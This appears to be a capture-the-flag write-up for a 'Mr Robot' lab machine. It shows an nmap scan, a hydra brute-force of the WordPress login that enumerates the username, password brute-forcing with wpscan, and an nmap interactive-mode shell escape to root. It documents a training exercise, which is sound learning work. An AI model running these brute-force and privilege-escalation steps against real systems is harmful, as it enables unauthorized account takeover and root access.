# Nmap 7.91 scan initiated Mon May 3 10:41:45 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.127.122 Nmap scan report for 10.10.127.122 Host is up (0.029s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 22/tcp closed ssh 80/tcp open http Apache httpd | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=www.example.com | Issuer: commonName=www.example.com | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2015-09-16T10:45:03 | Not valid after: 2025-09-13T10:45:03 | MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97 |_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon May 3 10:45:10 2021 -- 1 IP address (1 host up) scanned in 204.28 seconds
It's possible to launch an attack with hydra but it will try one credential set
at a time. So instead it is more efficient to do the bruteforce using wpscan as
with XML-RPC it will be able to perform about 1000 per request. But XML-RPC
Multicall was not enabled here so the traditional XML-RPC is only testing one per
request but it's still more handy than having to craft a valid regexp with hydra.
So with wpscan we could perform the following command providing both a username
list and password list but that makes 736438585600 possibilities.
Normally with Wordpress when you put a wrong username and password you get the
error ERROR: Invalid username so you know this is not he right username.
So you only try to bruteforce usernames and when you found one you can bruteforce the
password only and your get this error while it's wrong:
ERROR: The password you entered for the username <username> is incorrect..
So it makes x + y possibilities rather than x * y possibilities.
But it seems that wpscan is not able to do that. With wpscan it is possible to
bruteforce only username if we know the password or just
bruteforce the password if we know the username but it's not possible to bruteforce
the username without knowing the password.
So instead we will have to bruteforce the username with hydra.
In real life you would use the cleaned 11k fsocity_uniq.dic wordlsit
(maybe just with the uniqueness without the sorting alphabetically) but since the
right username is at position 15th in the dirty wordlist we'll use this one.
1 2 3 4 5 6 7 8
$ hydra -L fsocity.dic -p norajwhatever mrrobot.thm http-post-form "/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username" Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-03 15:47:40 [DATA] max 16 tasks per 1 server, overall 16 tasks, 858235 login tries (l:858235/p:1), ~53640 tries per task [DATA] attacking http-post-form://mrrobot.thm:80/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fmrrobot.thm%2Fwp-admin%2F&testcookie=1:F=Invalid username [80][http-post-form] host: mrrobot.thm login: Elliot password: norajwhatever ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.
Now that we know the username, we can bruteforce the password with wpscan instead of hydra.
The only limit is that wpscan takes only wordlist so we have to create a wordlsit of 1
one username.
It took me 21 minutes with the cleaned wordlist and password at 5627th position,
so I let you imagine the time it would have required if I used the dirty
wordlist with the password at 858151th position. Honestly I had to check a
writeup because with such a long time of bruteforce I was thinking it was not the
right way.
Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ ) Welcome to Interactive Mode -- press h <enter> for help nmap> !/bin/sh # id uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
nmap> !/bin/bash bash-4.3$ id uid=1002(robot) gid=1002(robot) groups=1002(robot)
Note: be sure to ask for sh and not bash at the last one has a security to drop
privileges.